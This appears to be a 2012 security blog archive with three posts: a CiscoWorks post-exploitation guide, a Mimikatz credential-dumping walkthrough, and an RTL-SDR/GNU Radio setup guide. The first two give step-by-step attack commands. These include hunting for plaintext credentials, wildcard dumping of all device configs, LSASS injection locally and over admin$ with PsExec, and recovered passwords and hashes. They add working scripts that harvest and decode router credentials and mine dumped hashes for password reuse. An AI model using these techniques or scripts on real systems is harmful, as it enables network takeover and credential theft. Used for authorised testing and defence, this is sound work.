Tuesday, June 26, 2012

Hack Tips: CiscoWorks Exploitation

by Tony Lee.

This article is the third in a series (See Hack Tips: Blackberry Enterprise Server and Hack Tips: Good For Enterprise) covering, step-by-step, practical post-exploitation tips that can be used to get the most out of various common network servers. This week’s victim is CiscoWorks. Compromising this server allows the attacker to remotely control network devices and dump all device configurations.

Even though CiscoWorks is End of Life (EOL) and has been replaced by Cisco Prime Infrastructure (CPI), we still see this management product in many environments, so it is still useful to know how to get the goods from Works.

Overview

Overall, the process involves the following steps:
  1. Identifying a CiscoWorks Server
  2. Obtaining CiscoWorks Administrator Credentials
  3. Interfacing with the CiscoWorks Web Interface
  4. Interfacing with the CiscoWorks Command Line Interface
  5. Dumping configs from CiscoWorks


Identifying The Host

  1. Host naming scheme
    • \\CiscoWorksBox
    • \\CISCOWKS
    • \\NETMNG
  2. Application Directory
    • C:\Program Files (x86)\CSCOpx
  3. User accounts
    • casuser (the CiscoWorks service account; note it in the net user output below)
      C:\ >net user
      
      User accounts for \\CiscoWorksDemoBox
      
      ----------------------------------------------------------
      casuser                  user                  user2
      user3
      The command completed successfully.
      
      
  4. Services
    • These Windows services are started:
      C:\ >net start
      
      --SNIP--
         CiscoWorks ANI database engine
         CiscoWorks Daemon Manager
         CiscoWorks RME NG database engine
         CiscoWorks Tomcat Servlet Engine
         CiscoWorks Web Server
      
      

Identifying Ciscoworks Account Credentials

  1. Dump the local Windows password hashes and crack them
  2. Data mine the CiscoWorks box for .bat and .txt files that contain plaintext credentials. This is surprisingly successful: network engineers are usually responsible for managing CiscoWorks, and they are notorious for being security ignorant. We recently found a test .bat file that was using ut.exe (a CiscoWorks tool) and disclosed the CiscoWorks credentials in plain text.
    • findstr /I /S /M pass c:\*
    • dir /a /s /b c:\*pass*


Interacting with Ciscoworks

Next we'll take a look at how we can interact with CiscoWorks and pull data from it.

Using the Ciscoworks Web Interface


CiscoWorks interface and options post-authentication

Source: http://www.netadmin.calpoly.edu/tools/cv-images/homepage.jpg

Browse to either of the URLs below for a nice summary (with screenshots) of what the server manages:
  • http://hostname:1741
  • https://hostname

From the local system, you can confirm Ciscoworks is listening by checking for a listener on TCP 1741, or TCP 443:
C:\> netstat -ano | findstr 1741
  TCP    0.0.0.0:1741           0.0.0.0:0              LISTENING       5136

C:\ >netstat -ano | findstr 443
  TCP    0.0.0.0:443           0.0.0.0:0              LISTENING       5136


Using the Ciscoworks Command line Application

The CiscoWorks command line application (cwcli.exe) has tons of options, including remotely running commands on managed devices! This could be very useful for an attacker, but use it with caution: a command pushed to the wrong device can really get you into trouble if you don't know what you're doing.

Running cwcli.exe is more or less straightforward, but you'll definitely have to check out -help for the full feature list.

C:\Program Files (x86)\CSCOpx\bin>cwcli.exe -help
------------------------------------
CiscoWorks command line Application.
------------------------------------
General syntax to run a command with arguments is
cwcli <command> <arguments>

For detailed help on a command and it's arguments, run
cwcli <command> -help

Dumping Device Configs from CiscoWorks

One noteworthy feature of cwcli.exe is its ability to dump device configurations from the command line! Given enough time, you could obtain every config from every device on the network. Here's how to tell cwcli.exe to grab those configs:

C:\Program Files (x86)\CSCOpx\bin>cwcli.exe export config -u <username> -p <password> -device %

SUMMARY
========
        Successful: ConfigExport: C:/PROGRA~2/CSCOpx/files/rme/cwconfig


The % character is a wildcard when using cwcli.exe; with it you could dump the configuration of every CiscoWorks-managed device. Just note that this could take a really long time on a large network. Also, it's probably worthwhile to note that, as a general best practice, system administrators should never use the -p option to specify the password on the command line, and that includes within scripts: it ends up in process listings, shell history and exactly the kind of .bat file we data-mined for credentials earlier.

And just to confirm we dumped some configurations:
C:\Program Files (x86)\CSCOpx\bin>dir ..\files\rme\cwconfig
Volume in drive C has no label.
Volume Serial Number is 0000-0000

Directory of C:\Program Files (x86)\CSCOpx\files\rme\cwconfig

12/25/2011  06:40 PM    <DIR>          .
12/25/2011  06:40 PM    <DIR>          ..
12/25/2011  06:40 PM            26,621 2011-11-09-06-40-28-950-devicename.xml
12/25/2011  06:40 PM            26,768 2011-11-09-06-40-29-919-devicename.xml
12/25/2011  06:40 PM            30,782 2011-11-09-06-40-30-294-devicename.xml
12/25/2011  06:40 PM            27,441 2011-11-09-06-40-30-591-devicename.xml
12/25/2011  06:40 PM            30,656 2011-11-09-06-40-30-841-devicename.xml
12/25/2011  06:40 PM            30,833 2011-11-09-06-40-31-247-devicename.xml
               6 File(s)        173,101 bytes
               2 Dir(s)  129,615,876,096 bytes free
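Once the configs are on disk, the real payoff is the credentials inside them: enable secrets, local usernames, SNMP communities (an RW community is device control by itself) and TACACS/RADIUS keys. The script below is an added example for this post, not a CiscoWorks tool or the author's code. It walks an export directory such as files\rme\cwconfig, treats each file as text (the exact XML wrapper RME puts around a config is not shown on this page, so the script matches on the IOS-style lines themselves), pulls out the credential-bearing lines, and decodes any type 7 values using the fixed XOR key that Cisco's reversible encoding has always used. The directory layout and the sample config embedded in the script are constructed for illustration.

```python
import os
import re
import sys

# The fixed XOR key behind Cisco's reversible "type 7" password encoding.
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"

# IOS-style lines worth harvesting. Whatever wrapper the export puts around
# the config is irrelevant: we match on the config lines themselves.
CRED_PATTERNS = [
    re.compile(r"^\s*(enable (?:secret|password)\b.*)$", re.M),
    re.compile(r"^\s*(username \S+ .*(?:password|secret)\b.*)$", re.M),
    re.compile(r"^\s*(snmp-server community .*)$", re.M),
    re.compile(r"^\s*(tacacs-server key .*)$", re.M),
    re.compile(r"^\s*(radius-server key .*)$", re.M),
]

# "password 7 <hex>", "secret 7 <hex>" or "key 7 <hex>": a reversible type 7 value.
TYPE7_RE = re.compile(r"\b(?:password|secret|key)\s+7\s+([0-9A-Fa-f]{4,})")


def decode_type7(encoded):
    """Reverse a type 7 string: two-digit decimal seed, then hex pairs XORed with the key."""
    seed = int(encoded[:2], 10)
    body = bytes.fromhex(encoded[2:])
    out = bytes(c ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)] for i, c in enumerate(body))
    return out.decode("ascii", errors="replace")


def harvest_credentials(config_text):
    """Return (line, decoded_type7_or_None) for every credential-bearing line."""
    findings = []
    for pattern in CRED_PATTERNS:
        for line in pattern.findall(config_text):
            line = line.strip()
            m = TYPE7_RE.search(line)
            decoded = decode_type7(m.group(1)) if m else None
            findings.append((line, decoded))
    return findings


def harvest_directory(path):
    """Walk a cwconfig-style export directory and harvest every file in it."""
    results = {}
    for root, _dirs, files in os.walk(path):
        for name in files:
            full = os.path.join(root, name)
            with open(full, "r", encoding="utf-8", errors="replace") as fh:
                found = harvest_credentials(fh.read())
            if found:
                results[full] = found
    return results


# Constructed sample of the IOS config text found inside an exported file.
# "094F471A1A0A" is the well-known type 7 encoding of "cisco";
# "020E01570709" encodes "hello" (computed with the algorithm above).
SAMPLE_CONFIG = """\
hostname core-sw-01
enable secret 5 $1$mERr$hx5rVt7rPNoS4wqbXKX7m0
username netops password 7 094F471A1A0A
username backup privilege 15 password 7 020E01570709
snmp-server community public RO
snmp-server community s3cr3t RW
tacacs-server key 7 094F471A1A0A
interface Vlan1
 ip address 10.0.0.1 255.255.255.0
"""

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    results = harvest_directory(target) if target else {"<sample>": harvest_credentials(SAMPLE_CONFIG)}
    for fname, found in results.items():
        print(fname)
        for line, decoded in found:
            print("  %s%s" % (line, "   -> %s" % decoded if decoded else ""))
```

Run it with the export directory as the only argument (on the box, or against a copy of the directory pulled back to your own machine). Type 7 is obfuscation, not encryption: `service password-encryption` only protects against shoulder surfing, and anything stored that way falls out instantly. Type 5 values (`enable secret 5 ...`) are MD5-crypt hashes and have to be cracked offline; SNMP communities are stored in the clear.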



Enjoy!


Tuesday, June 19, 2012

Using Mimikatz to Dump Passwords!

By Tony Lee.

If you haven't been paying attention, Mimikatz is a slick tool that pulls plain-text passwords out of WDigest (explained below) by interfacing with LSASS. There are a few other blogs describing mimikatz on the net, but this one will hopefully provide more detail about the components involved and ideas on how to use it. The tool itself and the download page are in French, which makes it "fun" to use if you don't speak French :)

Download

Mimikatz can be downloaded from:

A couple of things to take into consideration:
  1. The tool has 32-bit and 64-bit versions; make sure you pick the one matching the target OS (systeminfo is your friend)
  2. You need to run it as an administrator (it needs SeDebugPrivilege)
  3. It needs a DLL called sekurlsa.dll in order to inject into lsass.exe and dump the clear-text passwords (important to know, especially for remote dumping, since the DLL has to be copied over as well)

Use Cases


The key feature of this tool that sets it apart from other tools is its ability to pull plain-text passwords from the system instead of just password hashes. If your intention is to stay within the Windows environment and pass the hash this may not be that big of a deal. However, if you are exploring the curious case of password reuse across different environments—the plain-text password can be quite useful. For example, you have compromised a “Good for Enterprise” server that has a web interface which is not tied into AD single sign on. It might be useful to have the Good admin’s plain-text password to try against the Good for Enterprise web interface. Additionally, unless you have significant computational power, you may not crack an NTLM password hash—thus pulling the plain-text proves useful once again.

What the heck is WDigest?


WDigest is a DLL first added in Windows XP that is used to authenticate users for HTTP Digest authentication and Simple Authentication and Security Layer (SASL) exchanges. Both of these require the user's plain-text password in order to derive the key used to authenticate, which is why WDigest keeps the password in plain text.


Source: http://technet.microsoft.com/en-us/library/cc778868(WS.10).aspx
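Why a provider that answers Digest challenges has to hold on to the plaintext is easiest to see from the Digest computation itself. The snippet below is an added example, not code from the original post or from Microsoft's WDigest: it reproduces the RFC 2617 worked example in Python. The first step, H(A1) = MD5(username:realm:password), is where the password is consumed, and nothing derived from the NTLM hash (the MD4 of the UTF-16 password shown in the msv1_0 field) can be substituted for it, because the two hashes are computed over different inputs. The user, realm, nonce and password below are RFC 2617's own sample values, so the resulting response can be checked against section 3.5 of the RFC.

```python
import hashlib


def md5_hex(data):
    """MD5 hex digest of a str; RFC 2617's default algorithm for Digest."""
    return hashlib.md5(data.encode("utf-8")).hexdigest()


def digest_ha1(username, realm, password):
    """H(A1) = MD5(username:realm:password). This is the step that needs the plaintext."""
    return md5_hex("%s:%s:%s" % (username, realm, password))


def digest_response(username, realm, password, method, uri, nonce, nc, cnonce, qop="auth"):
    """Client-side response for qop=auth (RFC 2617 section 3.2.2.1)."""
    ha1 = digest_ha1(username, realm, password)
    ha2 = md5_hex("%s:%s" % (method, uri))
    return md5_hex("%s:%s:%s:%s:%s:%s" % (ha1, nonce, nc, cnonce, qop, ha2))


def verify_on_server(stored_ha1, method, uri, nonce, nc, cnonce, presented_response, qop="auth"):
    """Server side: recompute from a stored H(A1). Note that an NT hash would be
    useless here; only the password or this realm-specific H(A1) will do."""
    ha2 = md5_hex("%s:%s" % (method, uri))
    expected = md5_hex("%s:%s:%s:%s:%s:%s" % (stored_ha1, nonce, nc, cnonce, qop, ha2))
    return expected == presented_response


# RFC 2617 section 3.5 example: the server's challenge and the client's answer.
RFC_EXAMPLE = dict(
    username="Mufasa",
    realm="testrealm@host.com",
    password="Circle Of Life",
    method="GET",
    uri="/dir/index.html",
    nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093",
    nc="00000001",
    cnonce="0a4f113b",
)

if __name__ == "__main__":
    resp = digest_response(**RFC_EXAMPLE)
    ha1 = digest_ha1(RFC_EXAMPLE["username"], RFC_EXAMPLE["realm"], RFC_EXAMPLE["password"])
    print("H(A1):          ", ha1)
    print("client response:", resp)
    print("server accepts: ", verify_on_server(ha1, RFC_EXAMPLE["method"], RFC_EXAMPLE["uri"],
                                                RFC_EXAMPLE["nonce"], RFC_EXAMPLE["nc"],
                                                RFC_EXAMPLE["cnonce"], resp))
```

The server could get away with storing only H(A1) per realm, but a client-side provider that has to answer challenges from arbitrary realms on the user's behalf cannot know the realm in advance, so it needs the password itself. That is the design decision mimikatz is cashing in on.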

Running mimikatz


To run mimikatz you'll need mimikatz.exe and sekurlsa.dll on the system you're targeting. Once you launch mimikatz.exe from the command line you'll be provided with an interactive prompt that will allow you to perform a number of different commands. In the next sections we'll go over the following commands:

  • privilege::debug
  • inject::process lsass.exe sekurlsa.dll
  • @getLogonPasswords


Running locally (Windows 2008 R2 – 64-bit)


To enter the interactive mimikatz command prompt, just launch the executable:
mimikatz.exe


You'll be presented with a banner and a prompt:
C:\Users\Administrator\Desktop\mimikatz_trunk\x64>mimikatz.exe
mimikatz 1.0 x64 (alpha)        /* Traitement du Kiwi (Feb  9 2012 01:49:24) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # 



Next, we'll need to enable debug mode with the privilege::debug command:
mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK
mimikatz # 


Then we'll inject sekurlsa.dll into LSASS using the inject::process command:
mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 448
Attente de connexion du client...
Serveur connecté à un client !
Message du processus :
Bienvenue dans un processus distant
                        Gentil Kiwi

SekurLSA : librairie de manipulation des données de sécurités dans LSASS
mimikatz # 


Finally, we'll pull any available login passwords using the @getLogonPasswords macro:
mimikatz # @getLogonPasswords

Authentification Id         : 0;126660
Package d'authentification  : NTLM
Utilisateur principal       : Administrator
Domaine d'authentification  : FS
        msv1_0 :        lm{ f67ce55ac831223dc187b8085fe1d9df }, ntlm{ 161cff084477fe596a5db81874498a24 }      
        wdigest :       1qaz@WSX        
        tspkg :         1qaz@WSX

--SNIP--

mimikatz # exit
Fermeture du canal de communication




You should see one entry for each logon session. Note the msv1_0 and wdigest fields. The former contains the LM and NTLM hashes for the Administrator user (named in "Utilisateur principal") and the latter contains the WDigest entry, which is the plain-text password of the user!
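When you collect this output from more than a handful of hosts, parsing it beats reading it. The script below is an added example, not part of mimikatz or of the original post: it parses the French-labelled mimikatz 1.0 output shown above into one record per logon session and then groups the records by NTLM hash, so accounts that share a password (the reuse case from the Use Cases section) surface immediately, even where no plain-text was recovered. The sample block it parses is constructed to match the format above: the first session is the Administrator entry from this post, the other two are made up (the second reuses the same hash, the third carries the NT hash of an empty password).

```python
import re
from collections import defaultdict

# Field labels exactly as mimikatz 1.0 prints them (in French).
LABELS = {
    "Authentification Id": "auth_id",
    "Package d'authentification": "package",
    "Utilisateur principal": "user",
    "Domaine d'authentification": "domain",
}
HEADER_RE = re.compile(r"^\s*(Authentification Id|Package d'authentification|"
                       r"Utilisateur principal|Domaine d'authentification)\s*:\s*(.*?)\s*$")
MSV_RE = re.compile(r"^\s*msv1_0\s*:\s*lm\{\s*([0-9a-fA-F]*)\s*\},\s*ntlm\{\s*([0-9a-fA-F]*)\s*\}")
PROVIDER_RE = re.compile(r"^\s*(wdigest|tspkg|kerberos)\s*:\s*(.*?)\s*$")

EMPTY_LM = "0" * 32  # lm{ 000...0 } means no LM hash was stored


def parse_logon_passwords(text):
    """Turn @getLogonPasswords output into a list of dicts, one per logon session."""
    sessions = []
    current = None
    for raw in text.splitlines():
        line = raw.rstrip()
        m = HEADER_RE.match(line)
        if m:
            key = LABELS[m.group(1)]
            if key == "auth_id":  # every block opens with the authentication id
                current = {"lm": None, "ntlm": None, "wdigest": None, "tspkg": None, "kerberos": None}
                sessions.append(current)
            if current is not None:
                current[key] = m.group(2)
            continue
        if current is None:
            continue
        m = MSV_RE.match(line)
        if m:
            current["lm"] = m.group(1).lower() or None
            current["ntlm"] = m.group(2).lower() or None
            if current["lm"] == EMPTY_LM:
                current["lm"] = None
            continue
        m = PROVIDER_RE.match(line)
        if m:
            # hand-written "<-" annotations are not tool output; drop them
            current[m.group(1)] = m.group(2).split("<-")[0].strip() or None
    return sessions


def group_by_ntlm(sessions):
    """Map each NTLM hash to the set of DOMAIN\\user principals that use it."""
    groups = defaultdict(set)
    for s in sessions:
        if s.get("ntlm"):
            groups[s["ntlm"]].add("%s\\%s" % (s.get("domain"), s.get("user")))
    return groups


# Constructed sample in the mimikatz 1.0 format (second and third sessions made up).
SAMPLE = """\
Authentification Id         : 0;126660
Package d'authentification  : NTLM
Utilisateur principal       : Administrator
Domaine d'authentification  : FS
        msv1_0 :        lm{ f67ce55ac831223dc187b8085fe1d9df }, ntlm{ 161cff084477fe596a5db81874498a24 }
        wdigest :       1qaz@WSX
        tspkg :         1qaz@WSX

Authentification Id         : 0;184995
Package d'authentification  : NTLM
Utilisateur principal       : svc_backup
Domaine d'authentification  : FS
        msv1_0 :        lm{ 00000000000000000000000000000000 }, ntlm{ 161cff084477fe596a5db81874498a24 }
        wdigest :       1qaz@WSX        <- same password as Administrator

Authentification Id         : 0;999
Package d'authentification  : NTLM
Utilisateur principal       : Guest
Domaine d'authentification  : FS
        msv1_0 :        lm{ 00000000000000000000000000000000 }, ntlm{ 31d6cfe0d16ae931b73c59d7e0c089c0 }
"""

if __name__ == "__main__":
    sessions = parse_logon_passwords(SAMPLE)
    for s in sessions:
        print("%s\\%s ntlm=%s wdigest=%s" % (s.get("domain"), s.get("user"), s["ntlm"], s["wdigest"]))
    for ntlm, users in group_by_ntlm(sessions).items():
        if len(users) > 1:
            print("password reuse: %s shared by %s" % (ntlm, ", ".join(sorted(users))))
```

Point it at saved output (`parse_logon_passwords(open("host1.txt").read())`) and merge the session lists from every host before grouping; a service account whose NTLM hash shows up on twenty machines is the pivot you are looking for, whether or not its WDigest field was populated.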

Running Remotely (Windows 2003 – 32-bit)


Running mimikatz remotely is more or less the same, but you'll need to establish a connection to the system first. We'll do that here using the built-in Windows net commands and psexec.

We'll need to map the target's admin$ share in order to copy over sekurlsa.dll. Note that this requires pre-existing administrative access to the server, so you'll need a valid credential to map the share:
net use \\169.254.73.91\admin$ /u:169.254.73.91\mimidemo


Then just copy over sekurlsa.dll:
C:\Users\Administrator\Desktop\mimikatz_trunk\tools> copy ..\Win32\sekurlsa.dll \\169.254.73.91\admin$\system32  



Finally, we'll use psexec to run mimikatz:
C:\Users\Administrator\Desktop\mimikatz_trunk\tools>PsExec.exe /accepteula \\169.254.73.91 -c c:\Users\Administrator\Desktop\mimikatz_trunk\Win32\mimikatz.exe

PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com


mimikatz 1.0 x86 (alpha)        /* Traitement du Kiwi (Feb  9 2012 01:46:57) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # 


Now, at our mimikatz prompt, we can do the same as if we were running it locally:


mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK



mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 432
Attente de connexion du client...
Serveur connecté à un client !
Message du processus :
Bienvenue dans un processus distant
                        Gentil Kiwi

SekurLSA : librairie de manipulation des données de sécurités dans LSASS



mimikatz # @getLogonPasswords

--SNIP--

Authentification Id         : 0;184995
Package d'authentification  : NTLM
Utilisateur principal       : PowerAccnt
Domaine d'authentification  : SWITCH
        msv1_0 :        lm{ 00000000000000000000000000000000 }, ntlm{ 37**********************89 }
        wdigest :       j************************\  <-  Service account with Admin Privileges and suuuper long password   - Ouch


Authentification Id         : 0;62703
Package d'authentification  : NTLM
Utilisateur principal       : Administrator
Domaine d'authentification  : SWITCH
        msv1_0 :        lm{ 00000000000000000000000000000000 }, ntlm{ 4***************************d }
        wdigest :       ********************                                                        <- Admin account with suuuper long password    - Ouch

--SNIP--

mimikatz # exit
Fermeture du canal de communication




Cleanup


To delete sekurlsa.dll from the remote system:
del \\169.254.73.91\admin$\system32\sekurlsa.dll


Then just double check it's not there with:
dir \\169.254.73.91\admin$\system32\sekurlsa.dll
Volume in drive \\169.254.73.91\admin$ has no label.
Volume Serial Number is 34C7-0000

Directory of \\169.254.73.91\admin$\system32

File Not Found



Finally, we can remove our connection to the server:
net use \\169.254.73.91\admin$ /del
\\169.254.73.91\admin$ was deleted successfully.



Final Thoughts

Insanely awesome tool, and huge thanks to the author for sharing! This capability can be instrumental in leveraging password reuse, and it is another tool to add to the security toolbox for sure. Also note that Hernan Ochoa added this capability to Windows Credential Editor version 1.3 Beta using the "-w" flag.

Got some tips of your own? Let us know in the comments below!!!


Tuesday, June 12, 2012

Getting Started with GNU Radio and RTL-SDR (on Backtrack)

By Brad Antoniewicz.

In this blog post I'll aim to get you at least partially familiar with Software Defined Radio, the Realtek RTL2832U chipset, and provide Backtrack 5 R2 setup and usage instructions so that you can easily get off to a good start.

Software Defined Radio


In the last few years, Software Defined Radio (SDR) has been drawing a lot of attention from radio enthusiasts and hackers alike. This is because SDRs move much of the signal processing from hardware into software, which provides incredible flexibility. For instance, with a standard 2.4 GHz 802.11 adapter your use cases are relatively limited: transmitting and monitoring 802.11 traffic in the 2.4 GHz band. With an SDR, since the processing is not locked into the firmware of the adapter, you have far greater capabilities: you're limited only by the frequency range the hardware supports and not by the protocol. So you could transmit and monitor anything that exists within the 2.4 GHz band, such as cordless phones, Bluetooth devices, microwave ovens, car alarms, video devices, ZigBee (the list goes on and on) and, of course, 802.11.

GNU Radio



GNU Radio is the development toolkit that handles the signal processing for the SDR hardware (or for a file containing recorded samples). This is essentially the workhorse of SDR. Unfortunately, GNU Radio has a reputation for being not so well documented and a bit bloated. That's OK though; whether you agree or not, you cannot deny that its maintainers are doing really amazing work. In my opinion, if you don't like the documentation, then it's up to you to write good guides so that people can utilize this great work.

Hardware


Obviously a big component of SDR is the hardware. Although there are a number of different platforms out there, we'll discuss the USRP and the ones built on the RTL2832U chipset (since that's the topic of this blog post).

USRP



The Universal Software Radio Peripheral (USRP) by Ettus Research (who must be raking in the dough, based on their new website) is, and pretty much has been, the de facto hardware component of SDR for the last 5 years (probably more). The USRP is modular and can support just about any radio frequency spectrum.

The USRP's main problem is that it's really expensive. The main component ranges from $650 - $1700, and then you need daughter boards for the specific frequency spectrum you want to play with, which are $74 - $450 each. Then there are antennas, cables, and other accessories. Sure, you could always use the open source schematics to build your own, but seriously, who the heck is going to do that. In a community that is known for being creative with costs, the USRP really builds a wall between the classes. Sucks..

Realtek RTL2832U



It was recently discovered that a number of manufacturers have released digital TV USB capture devices that use the Realtek RTL2832U chipset. The chipset was created to do DVB-T (digital TV) and COFDM (digital radio) demodulation for these adapters; however, a curious radio enthusiast named Antti Palosaari discovered that:

These $20 adapters are actually SDRs!

As you can imagine, this discovery sparked a whole lot of interest. Soon the Osmocom OsmoSDR team built the necessary software to interact with the chipset and called it RTL-SDR. Additionally, RTL-SDR fans started documenting all of their experiences on the /r/RTLSDR/ subreddit. People began doing everything they could with their brand new, super cheap RTL-SDRs.


Supported Frequencies

One of the major downsides to the RTL2832U is the tuning range: roughly 64 to 1700 MHz, depending on the tuner chip in front of it (the Elonics E4000 in the rtl_test output further down reports 52 to 2218 MHz, with a gap around 1.1 to 1.2 GHz). This means we're somewhat confined in the technologies we can play with. That being said, it's really nothing to complain about because there are a ton of things within that spectrum (and for $20, complaining is not allowed)!


Supported Adapters

It's pretty crucial that when choosing what DVB-T dongles you buy, you first consult the various compatibility lists out there to ensure the adapter you're looking at, actually has a RTL2832U chipset and works well. Here are a couple to consult:

Where to buy
The one shown in the picture is mine, which was actually gifted to me (Thanks Steve!), bought at Deal Extreme (a.k.a. the shadiest site I buy from on the internet). It's the "DVB-T TV Receiver Realtek RTL2832U Elonics E4000 Radio P335", and can also be found on eBay for $18.88 (free shipping).

There's a list of adapters and where to buy them at:

Configuration


The Windows RTL-SDR setup and configuration is pretty well documented in a variety of places online. I like to use Linux for most of my tinkering, so this guide will focus specifically on setting things up and using Backtrack 5 R2. If you're using Mac OS X, you're kind of screwed: RTL-SDR requires GNU Radio >= v3.5.3, MacPorts doesn't have it pre-built for you, and compiling from source is super painful and requires a lot of manual code edits to get things working. Stick with a BT5R2 or Windows virtual machine until someone actually gets a MacPorts package out.

Making sure your adapter is registered


Before doing anything, make sure you have the adapter plugged in and that it's detected by the system.
 root@bt:~# lsusb | grep -i RTL  
 Bus 001 Device 008: ID 0bda:2832 Realtek Semiconductor Corp. RTL2832U DVB-T  


Manual Labor


The people over at hack4fun wrote up an article about how to build everything from scratch. If you'd like to, that's a good guide to get you up and running to a certain point, but the truth is, you don't need to do that much work. There are a couple of scripts and other things that will accomplish the exact same thing (build from source) with much less typing.

The build-gnuradio script


Marcus Leech wrote a really simple-to-use script called build-gnuradio. This works great, but needs a handful of modifications in order to work on Backtrack. The main changes are to remove the sudo checks, since Backtrack runs as root. I also added a patch for gr-smartnet to work a little better. An obviously more secure alternative would be to create a non-root user and run the script as that user, but since I always use Backtrack in a non-persistent mode, that isn't a major concern of mine.

My modified version of the build-gnuradio script (called build-gnuradio-bt) can be downloaded here: Note: At the time of this writing the author of gr-smartnet just started to resume work on the project. There's a possibility that by the time you read this, he'll have figured out a way around the above gnuradio patch.

The way the script works is that it checks for a packages directory (included in the bundle described in the "The really easy way" section below), and if it doesn't find it, it falls back to the standard build-gnuradio behaviour and downloads all the required sources, compiles them, and installs. During the gnuradio build it will look for a "patches/gnuradio_gri_wav-v0.1.patch" file that patches gnuradio to work with gr-smartnet. If it can't find the patch, it'll just continue on and compile. Since the script runs as root and pulls everything it builds off the network, read through it before you run it. To run the script, make sure you have internet access and type:
root@bt:~# wget https://raw.github.com/brad-anton/gnuradio/master/build-gnuradio-bt
root@bt:~# mkdir patches
root@bt:~# cd patches
root@bt:~/patches# wget https://raw.github.com/brad-anton/gnuradio/master/gnuradio_gri_wav-v0.1.patch
root@bt:~/patches# cd ..
root@bt:~# chmod +x build-gnuradio-bt
root@bt:~# ./build-gnuradio-bt


It will take some time to run so be patient. If you're using non-persistent backtrack or don't want to wait a long time for everything to compile, check out the next section, its much faster.

The really easy way


Since I use non-persistent Backtrack a lot and often don't have internet access when I do so, I built everything from scratch then created packages for all of the components.

The downside of this way is that you'll have to download a 290 MB file that contains all the packages, but once that's done, it's smooth sailing from there.

You can download the bundle (gnuradio_rtl-sdr_bt5r2_bundle_v0.1.tar.bz2) here:

Integrity checks (verify them before you run anything out of the archive, since build-gnuradio-bt runs as root):
md5sum gnuradio_rtl-sdr_bt5r2_bundle_v0.1.tar.bz2
a603351e08318a963ee850c69acfcbb8 gnuradio_rtl-sdr_bt5r2_bundle_v0.1.tar.bz2

sha1sum gnuradio_rtl-sdr_bt5r2_bundle_v0.1.tar.bz2
66eeb8eaace16f2af73b7d77be3c035fa2359f81 gnuradio_rtl-sdr_bt5r2_bundle_v0.1.tar.bz2


I just copy the bundle to the root of my BT5R2 USB stick; then, once it's booted, just:

root@bt:~# tar -jxf /cdrom/gnuradio_rtl-sdr_bt5r2_bundle_v0.1.tar.bz2 
root@bt:~# cd gnuradio_rtl-sdr_bt5r2_bundle_v0.1/
root@bt:~/gnuradio_rtl-sdr_bt5r2_bundle_v0.1# ./build-gnuradio-bt 


The script will ask you to proceed and you should see output similar to this:
[+] Offline install -> Installing gnuradio + supporting libraries
[+] Removing potentially conflicting packages
[+] Installing precompiled binaries from /root/gnuradio_rtl-sdr_bt5r2_bundle_v0.1/packages
[+] Wrapping up install
[+] Copying util to ~/rtl_sdr-utils
[+] Offline installation Completed! Enjoy!


Then you can rm the directory to free up disk space
root@bt:~/gnuradio_rtl-sdr_bt5r2_bundle_v0.1# cd ..
root@bt:~# rm -rf gnuradio_rtl-sdr_bt5r2_bundle_v0.1/


Using RTL-SDR


Once you have it all installed, a simple test to make sure the adapter is recognized is to use the rtl_test utility to run a quick benchmark. Your output should look similar to this:

root@bt:~# rtl_test -t
Found 1 device(s):
  0:  Generic RTL2832U (e.g. hama nano)

Using device 0: Generic RTL2832U (e.g. hama nano)
Found Elonics E4000 tuner
Supported gain values (18): -1.0 1.5 4.0 6.5 9.0 11.5 14.0 16.5 19.0 21.5 24.0 29.0 34.0 42.0 43.0 45.0 47.0 49.0 
Benchmarking E4000 PLL...
[E4K] PLL not locked for 51000000 Hz!
[E4K] PLL not locked for 2219000000 Hz!
[E4K] PLL not locked for 1109000000 Hz!
[E4K] PLL not locked for 1237000000 Hz!
E4K range: 52 to 2218 MHz
E4K L-band gap: 1109 to 1237 MHz
root@bt:~# 


Multimode.py

Marcus Leech created a tool called Multimode that acts as a multi-mode receiver for a variety of modes such as FM, AM, SSB, WFM, and TV-FM. This is the perfect tool to start playing with SDR.

Installation

If you used the easy way above, then multimode is already installed; if not, you'll need to install it:
root@bt:~# svn co https://www.cgran.org/svn/projects/multimode
A    multimode/trunk
A    multimode/trunk/multimode_helper.py
A    multimode/trunk/multimode.py
A    multimode/trunk/COPYING
A    multimode/trunk/multimode.grc
A    multimode/trunk/Makefile
A    multimode/trunk/README
Checked out revision 996.
root@bt:~# cd multimode/trunk/
root@bt:~/multimode/trunk# make install
mkdir -p /root/bin
cp multimode.py multimode_helper.py /root/bin
Please make sure your PYTHONPATH includes /root/bin
And also that PATH includes /root/bin
this will allow multimode to work correctly
root@bt:~/multimode/trunk# export PYTHONPATH=$PYTHONPATH:/root/bin
root@bt:~/multimode/trunk# export PATH=$PATH:/root/bin

Interface


If you launch multimode with no options:
root@bt:~/bin# ./multimode.py 

It will listen on 150 MHz (narrowband FM). Make sure you have your speakers turned on and the volume up. Remember, multimode is decoding the over-the-air signals and playing them back for your enjoyment, so no sound = no fun. Obviously, if nothing is transmitting in your area on 150 MHz then you'll need to change it.

The interface can become a little sluggish and sometimes unresponsive on slower machines, so be patient. It is broken up into three main parts:
  1. Controls (Top)
  2. Spectrograph (Middle)
  3. Panorama (Bottom)



The guys at hack4fun cut out the spectrograph in the version they use on their site, because the panorama was getting cut off by the bottom of the screen.

Listening to FM Radio!


The local [crappy] radio station here in NYC is Z100, or more specifically 100.3FM. To leverage multimode.py to access it, just launch it with the following attributes:
root@bt:~/bin# ./multimode.py --freq 100.3M --dmode=WFM

And you should be able to hear the radio station playing!

Need the weather forecast? Check out 162.550 MHz (NOAA Weather Radio):

root@bt:~/bin# ./multimode.py --freq 162.550M

Listening to Local Law Enforcement!


